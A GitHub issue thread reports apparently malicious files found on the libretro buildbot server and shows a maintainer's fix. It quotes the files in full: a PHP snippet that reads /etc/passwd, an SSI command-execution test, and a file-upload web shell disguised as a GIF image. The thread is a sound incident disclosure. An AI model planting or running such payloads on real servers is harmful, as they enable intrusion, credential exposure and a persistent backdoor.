### ISSUE TITLE
[Buildbot] Strange files on the buildbot, attempted attack?

### ISSUE THREAD

**Issue by emoose** [libretro/RetroArch#8004]
Sorry if this isn't the right place to bring this up, but I noticed some strange files on the buildbot, seems like there might have been an attempted attack of some kind.

The three files are at https://buildbot.libretro.com/nightly/windows, all dated 2018-12-03 17:39 to 2018-12-03 17:43.

First file "HEADER":

```
<?php
echo file_get_contents('/etc/passwd');
```

Second file "ssi.shtml":

```
<pre>
<!--#exec cmd="id" -->
</pre> 
```

Third file "up.php.jpg":

```
GIF89a1
<?php
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2888888';
 
    $file_name = $_FILES['image']['name'];
    $temporari = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$file_name;
        @move_uploaded_file($temporari, $abod);
 
echo"<center><b>Link ==> <a href='$file_name' target=_blank>$file_name</a></b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
} 
?>
```

Whoever did this obviously had the ability to write files to the buildbot directories, no way for me to know what else they might have done though.

Really hoping this is just a test or something done by a libretro team member, otherwise you might want to check your server/binaries.

**Comment by RobLoach** [comment]
I've renamed the above files to be hidden files, and disallowed uploads through h5ai.

**Comment by RobLoach** [comment]
Going to close this one for now, let's talk more on Discord/IRC. Thanks for the find, @emoose :+1:
